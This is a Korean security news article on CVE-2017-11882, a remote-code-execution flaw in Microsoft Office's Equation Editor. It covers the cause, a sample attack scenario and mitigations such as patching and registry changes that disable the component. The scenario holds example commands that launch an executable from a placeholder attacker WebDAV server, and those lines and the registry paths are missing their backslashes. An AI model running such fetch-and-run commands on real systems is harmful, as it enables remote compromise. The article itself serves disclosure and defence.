MS의 내장 기능인 ‘패치 되지 않는’ DDE 이외에도 해외 보안연구원들이 또 다른 오피스 컴포넌트의 심각한 문제를 발견했다. 이를 통해 공격자들은 타깃 PC에서 원격으로 멀웨어를 설치할 수 있다.
이 취약점은 메모리 손상 문제다. MS 오피스 365를 포함한 지난 17년간 출시 되어온 마이크로소프트 오피스의 모든 버전에 존재한다. 또한 모든 최신 윈도우 10 Creators 업데이트를 포함한 모든 버전의 윈도우 OS에서 동작한다.
이 취약점은 원격 코드 실행으로 이어지며, 인증 되지 않은 공격자가 원격으로 타깃 시스템에서 악성 코드를 실행할 수 있도록 허용한다. 이 과정에서 사용자가 악성 문서를 오픈한 후에는 아무런 상호작용도 필요하지 않아 더욱 위험하다.
CVE-2017-11882로 등록 된 이 취약점은 문서에 방정식(OLE 오브젝트)를 삽입하고 편집하는 MS Office의 컴포넌트인 EQNEDT32.EXE에 존재한다.
부적절한 메모리 운영으로 인해 이 컴포넌트가 메모리에서 오브젝트들을 적절히 처리하는데 실패해, 공격자가 로그인한 사용자 권한으로 악성 코드를 실행할 수 있도록 허용하게 된다.
17년 전, MS오피스 2000에서 EQNEDT32.EXE가 도입 되었으며 이전 버전 문서의 호환을 위해 MS Office 2007 이후 공개 된 모든 버전에 이 컴포넌트가 포함 되었다.
이 취약점을 악용하기 위해서는 취약한 MS Office나 MS WordPad를 사용해 특별히 제작한 악성 파일을 오픈해야 한다.
이 취약점은 CVE-2017-11847과 같은 윈도우 커널 권한 상승 익스플로잇과 함께 사용 될 경우 시스템 전체 제어 권한을 갖게 될 수 있다.
가능한 공격 시나리오는 다음과 같다.
이 취약점을 악용한 OLE 오브젝트 몇 개를 삽입함으로써 임의의 명령을 실행할 수 있게 된다.
또 임의의 코드를 실행하는 가장 쉬운 방법들 중 하나는 공격자가 제어하는 WebDAV 서버로부터 실행 파일을 다운받는 것이다.
하지만 공격자는 이 취약점을 이용해 cmd.exe /c start attacker_ipff와 같은 명령어를 실행할 수 있게 된다. 익스플로잇의 일부로 이러한 명령어를 사용해 WebClient를 시작할 수 있다.
이후, 공격자는 attacker_ipff1.exe 명령어를 사용해 WebDAV 서버로부터 실행 파일을 시작할 수 있다. 이 실행 파일의 시작 매커니즘은 live.sysinternals.comtools 서비스와 유사하다.
보안연구원들은 MS 오피스 취약점으로부터 보호 하는 법에 대해 “마이크로소프트는 이달 패치를 공개하면서 영향을 받은 소프트웨어가 메모리 내의 오브젝트를 처리하는 방식을 수정해 이 취약점을 수정했다. 따라서 사용자들은 11월 패치를 최대한 빨리 적용하기를 권고한다”며 “이 컴포넌트에는 악용될 소지가 있는 다수의 보안 문제가 있기 때문에 비활성화 하면 보안을 강화시킬 수 있다”고 전했다.
또 명령 프롬프트에서 아래의 명령어를 실행하면 윈도우 레지스트리에 해당 컴포넌트가 등록 되는 것을 방지할 수 있다.
reg add "HKLMSOFTWAREMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
64비트 OS에서 32비트 MS Office 패키지를 사용한다면 아래의 명령어를 실행하면 된다:
reg add "HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
이 외에도 사용자들은 Protected View(마이크로소프트 오피스 샌드박스)를 활성화해 활성 컨텐츠 (OLE/ActiveX/Macro) 실행을 막을 수 있다고 전했다. [정보제공. 이스트시큐리티]
★정보보안 대표 미디어 데일리시큐!★